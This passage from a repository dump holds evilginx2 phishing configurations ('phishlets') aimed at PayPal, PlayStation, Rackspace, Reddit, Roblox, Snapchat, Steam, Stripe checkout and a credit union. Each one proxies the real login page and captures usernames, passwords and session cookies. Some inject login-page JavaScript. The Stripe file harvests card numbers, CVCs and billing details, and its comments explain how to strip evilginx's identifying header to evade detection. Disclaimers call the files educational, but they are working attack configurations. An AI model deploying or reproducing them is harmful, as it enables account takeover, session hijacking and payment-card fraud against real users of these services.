'application/x-javascript']} 23 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 24 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 25 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 26 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 27 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 28 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 29 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 30 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 31 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 32 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 33 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 34 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 35 | 36 | auth_tokens: 37 | - domain: '.paypal.com' 38 | keys: ['.*,regexp'] 39 | auth_urls: 40 | - '/myaccount/summary' 41 | - '/myaccount/.*' 42 | 43 | credentials: 44 | username: 45 | key: 'login_email' 46 | search: '(.*)' 47 | type: 'post' 48 | password: 49 | key: 'login_password' 50 | search: '(.*)' 51 | type: 'post' 52 | 53 | login: 54 | domain: 'www.paypal.com' 55 | path: '/signin' 56 | 57 | js_inject: 58 | - trigger_domains: ["www.paypal.com"] 59 | trigger_paths: ["/signin"] 60 | trigger_params: ["email"] 61 | script: | 62 | function lp(){ 63 | var email = document.querySelector("#email"); 64 | if (email != null && password != null) { 65 | email.value = "{email}"; 66 | return; 67 | } 68 | setTimeout(function(){lp();}, 100); 69 | } 70 | setTimeout(function(){lp();}, 100); 71 | -------------------------------------------------------------------------------- /phishlet_examples/playstation.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'id', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true} 5 | - {phish_sub: 'auth.api', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'playstation.com', session: true, is_landing: true} 7 | - {phish_sub: 'accounts.api', orig_sub: 'accounts.api', domain: 'playstation.com', session: true, is_landing: true} 8 | - {phish_sub: 'smetrics.aem', orig_sub: 'smetrics.aem', domain: 'playstation.com', session: true, is_landing: true} 9 | - {phish_sub: 'eventcom.api.np.km', orig_sub: 'eventcom.api.np.km', domain: 'playstation.net', session: true, is_landing: true} 10 | - {phish_sub: 'pdr-srlc.api', orig_sub: 'pdr-srlc.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true} 11 | 12 | #lengtmp+oszxh@gmail.com 13 | 14 | sub_filters: 15 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'accounts.api', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 19 | 20 | 21 | - {triggers_on: 'www.playstation.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | - {triggers_on: 'www.playstation.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 23 | - {triggers_on: 'www.playstation.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 24 | 25 | 26 | auth_tokens: 27 | - domain: '.sonyentertainmentnetwork.com' 28 | keys: ['bm_sz,opt','_abck,opt','s_cc,opt','s_sq'] 29 | - domain: 'auth.api.sonyentertainmentnetwork.com' 30 | keys: ['JSESSIONID'] 31 | - domain: 'id.sonyentertainmentnetwork.com' 32 | keys: ['akacd_pdr-id2-sencom-bdl,opt'] 33 | 34 | credentials: 35 | username: 36 | key: 'username' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: 'password' 41 | search: '(.*)' 42 | type: 'post' 43 | login: 44 | domain: 'id.sonyentertainmentnetwork.com' 45 | path: '/signin/' 46 | -------------------------------------------------------------------------------- /phishlet_examples/rackspace.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'rackspace.com', session: true, is_landing: true} 6 | - {phish_sub: '', orig_sub: '', domain: 'rackspace.com', session: true, is_landing: false} 7 | 8 | sub_filters: 9 | - {triggers_on: 'login.rackspace.com', orig_sub: 'login', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'login.rackspace.com', orig_sub: '', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | 12 | 13 | auth_tokens: 14 | - domain: 'login.rackspace.com' 15 | keys: ['.*,regexp'] 16 | auth_urls: 17 | - '' 18 | credentials: 19 | username: 20 | key: 'name="username"' 21 | search: '(.*)' 22 | type: 'post' 23 | password: 24 | key: 'name="password"' 25 | search: '(.*)' 26 | type: 'post' 27 | login: 28 | domain: 'login.rackspace.com' 29 | path: '/login' 30 | 31 | -------------------------------------------------------------------------------- /phishlet_examples/reddit.yaml: -------------------------------------------------------------------------------- 1 | author: '@customsync' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true} 5 | - {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false} 6 | - {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 11 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 12 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']} 13 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 14 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 15 | auth_tokens: 16 | - domain: '.reddit.com' 17 | keys: ['reddit_session'] 18 | credentials: 19 | username: 20 | key: 'username' 21 | search: '(.*)' 22 | type: 'post' 23 | password: 24 | key: 'password' 25 | search: '(.*)' 26 | type: 'post' 27 | login: 28 | domain: 'www.reddit.com' 29 | path: '/login' 30 | -------------------------------------------------------------------------------- /phishlet_examples/roblox.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | author: '@AN0NUD4Y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'roblox.com', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: '', domain: 'roblox.com', session: true, is_landing: false} 9 | - {phish_sub: 'assetgame', orig_sub: 'assetgame', domain: 'roblox.com', session: true, is_landing: false} 10 | - {phish_sub: 'auth', orig_sub: 'auth', domain: 'roblox.com', session: true, is_landing: false} 11 | - {phish_sub: 'metrics', orig_sub: 'metrics', domain: 'roblox.com', session: true, is_landing: false} 12 | - {phish_sub: 'realtime', orig_sub: 'realtime', domain: 'roblox.com', session: true, is_landing: false} 13 | - {phish_sub: 'apis', orig_sub: 'apis', domain: 'roblox.com', session: true, is_landing: false} 14 | - {phish_sub: 'locale', orig_sub: 'locale', domain: 'roblox.com', session: true, is_landing: false} 15 | - {phish_sub: 'accountsettings', orig_sub: 'accountsettings', domain: 'roblox.com', session: true, is_landing: false} 16 | - {phish_sub: 'js', orig_sub: 'js', domain: 'rbxcdn.com', session: true, is_landing: false} 17 | - {phish_sub: 'ecsv2', orig_sub: 'ecsv2', domain: 'roblox.com', session: true, is_landing: false} 18 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false} 19 | - {phish_sub: 'thumbnails', orig_sub: 'thumbnails', domain: 'roblox.com', session: true, is_landing: false} 20 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false} 21 | - {phish_sub: 'chat', orig_sub: 'chat', domain: 'roblox.com', session: true, is_landing: false} 22 | - {phish_sub: 'notifications', orig_sub: 'notifications', domain: 'roblox.com', session: true, is_landing: false} 23 | - {phish_sub: 'economy', orig_sub: 'economy', domain: 'roblox.com', session: true, is_landing: false} 24 | - {phish_sub: 'friends', orig_sub: 'friends', domain: 'roblox.com', session: true, is_landing: false} 25 | 26 | sub_filters: 27 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'roblox.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 28 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'rbxcdn.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 29 | 30 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 31 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 32 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 33 | 34 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 35 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 36 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 37 | 38 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 39 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 40 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 41 | 42 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 43 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 44 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 45 | 46 | auth_tokens: 47 | - domain: '.roblox.com' 48 | keys: ['GuestData', '.ROBLOSECURITY','RBXSessionTracker','.*,regexp'] 49 | - domain: '.www.roblox.com' 50 | keys: ['gig_canary','gig_canary_ver' ,'.*,regexp'] 51 | 52 | auth_urls: 53 | - '/home' 54 | - '/home/.*' 55 | credentials: 56 | username: 57 | key: 'cvalue' 58 | search: '(.*)' 59 | type: 'post' 60 | password: 61 | key: 'password' 62 | search: '(.*)' 63 | type: 'post' 64 | custom: 65 | - key: 'ctype' 66 | search: '(.*)' 67 | type: 'post' 68 | 69 | login: 70 | domain: 'www.roblox.com' 71 | path: '/Login' -------------------------------------------------------------------------------- /phishlet_examples/snapchat.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | author: '@an0nud4y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: '', domain: 'snapchat.com', session: true, is_landing: false} 9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'snapchat.com', session: true, is_landing: false} 10 | - {phish_sub: 'csp-central', orig_sub: 'csp-central', domain: 'appspot.com', session: true, is_landing: false} 11 | 12 | sub_filters: 13 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 14 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 17 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 18 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 19 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 20 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 22 | 23 | auth_tokens: 24 | - domain: '.snapchat.com' 25 | keys: ['sc-a-nonce', '.*,regexp'] 26 | - domain: 'accounts.snapchat.com' 27 | keys: ['web_client_id', 'sc-cookies-accepted', 'sc-a-csrf', 'sc-a-session', 'xsrf_token', '.*,regexp'] 28 | auth_urls: 29 | - '/accounts/welcome' 30 | credentials: 31 | username: 32 | key: 'username' 33 | search: '(.*)' 34 | type: 'post' 35 | password: 36 | key: 'password' 37 | search: '(.*)' 38 | type: 'post' 39 | login: 40 | domain: 'accounts.snapchat.com' 41 | path: '/accounts/login' 42 | -------------------------------------------------------------------------------- /phishlet_examples/steam.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | author: '@An0nud4y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: '', orig_sub: '', domain: 'steamcommunity.com', session: true, is_landing: true} 8 | 9 | sub_filters: 10 | - {triggers_on: 'steamcommunity.com', orig_sub: 'login', domain: 'steamcommunity.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html$ 11 | 12 | auth_tokens: 13 | - domain: 'steamcommunity.com' 14 | keys: ['xf_user', 'xf_session'] 15 | 16 | credentials: 17 | username: 18 | key: 'username' 19 | search: '(.*)' 20 | type: 'post' 21 | password: 22 | key: 'unenc_password' 23 | search: '(.*)' 24 | 25 | login: 26 | domain: 'steamcommunity.com' 27 | path: '/login/home/' 28 | 29 | js_inject: 30 | - trigger_domains: ["steamcommunity.com"] 31 | trigger_paths: ["/login/home/"] 32 | trigger_params: [] 33 | script: | 34 | function onclickListener(){ 35 | var submit = document.querySelectorAll('button[type=submit]')[0]; 36 | submit.setAttribute("onclick", "sendPass()"); 37 | return; 38 | } 39 | function sendPass(){ 40 | var password = document.getElementsByName("password")[0].value; 41 | var xhr = new XMLHttpRequest(); 42 | xhr.open("POST", '/login/device-based/regular/login/', true); 43 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 44 | xhr.send("unenc_password="+encodeURIComponent(password)); 45 | return; 46 | } 47 | setTimeout(function(){ onclickListener(); }, 2500); 48 | 49 | 50 | 51 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 52 | # PLEASE DO NOT MISUSE THIS PHISHLET. 53 | -------------------------------------------------------------------------------- /phishlet_examples/stripe.yaml: -------------------------------------------------------------------------------- 1 | # Checkout Docs for reference 2 | # https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination 3 | 4 | # Steps to follow to integrate evilginx checkout in original payment checkout page 5 | # 6 | # 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain 7 | # 2) Read docs for other possible issues (Mentioned Above) 8 | # 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website. 9 | # 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user. 10 | # 11 | 12 | 13 | 14 | # Checkout Page - 15 | # 16 | # https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl 17 | 18 | 19 | ## List of SubDomains --- 20 | # https://m.stripe.com 21 | # https://m.stripe.network/ 22 | # https://js.stripe.com 23 | # https://q.stripe.com 24 | # https://api.stripe.com/ 25 | # https://r.stripe.com/ 26 | # https://stripe-camo.global.ssl.fastly.net/ 27 | # https://checkout.stripe.com 28 | 29 | 30 | 31 | 32 | 33 | # Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go), 34 | # Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevent code to remove the evilginx header (X-Evilginx) 35 | 36 | 37 | name: 'stripe' 38 | author: '@an0nud4y' 39 | min_ver: '2.4.0' 40 | proxy_hosts: 41 | - {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true} 42 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 43 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false} 44 | - {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 45 | - {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 46 | - {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 47 | - {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false} 48 | - {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false} 49 | 50 | sub_filters: 51 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 52 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 53 | 54 | auth_tokens: 55 | - domain: '.stripe.com' 56 | keys: ['.*,regexp'] 57 | - domain: 'm.stripe.com' 58 | keys: ['.*,regexp'] 59 | - domain: 'stripe.com' 60 | keys: ['.*,regexp'] 61 | 62 | credentials: 63 | username: 64 | key: 'card[number]' 65 | search: '(.*)' 66 | type: 'post' 67 | password: 68 | key: 'card[cvc]' 69 | search: '(.*)' 70 | type: 'post' 71 | custom: 72 | - key: 'type' 73 | search: '(.*)' 74 | type: 'post' 75 | - key: 'card[number]' 76 | search: '(.*)' 77 | type: 'post' 78 | - key: 'card[cvc]' 79 | search: '(.*)' 80 | type: 'post' 81 | - key: 'card[exp_month]' 82 | search: '(.*)' 83 | type: 'post' 84 | - key: 'card[exp_year]' 85 | search: '(.*)' 86 | type: 'post' 87 | - key: 'billing_details[name]' 88 | search: '(.*)' 89 | type: 'post' 90 | - key: 'billing_details[email]' 91 | search: '(.*)' 92 | type: 'post' 93 | - key: 'guid' 94 | search: '(.*)' 95 | type: 'post' 96 | - key: 'muid' 97 | search: '(.*)' 98 | type: 'post' 99 | - key: 'sid' 100 | search: '(.*)' 101 | type: 'post' 102 | - key: 'payment_user_agent' 103 | search: '(.*)' 104 | type: 'post' 105 | 106 | 107 | auth_urls: 108 | - '/' 109 | - '/c' 110 | 111 | login: 112 | domain: 'checkout.stripe.com' 113 | path: '/' 114 | -------------------------------------------------------------------------------- /phishlet_examples/sununion.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'suncoastcreditunion.com', session: true, is_landing: true} - {phish_sub: '', orig_sub: '', domain: 'suncoastcreditunion.com', session: true, is_landing: false} - {phish_sub: 'banking', orig_sub: 'banking', domain: 'suncoastcreditunion.com', session: true, is_landing: false} sub_filters: - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 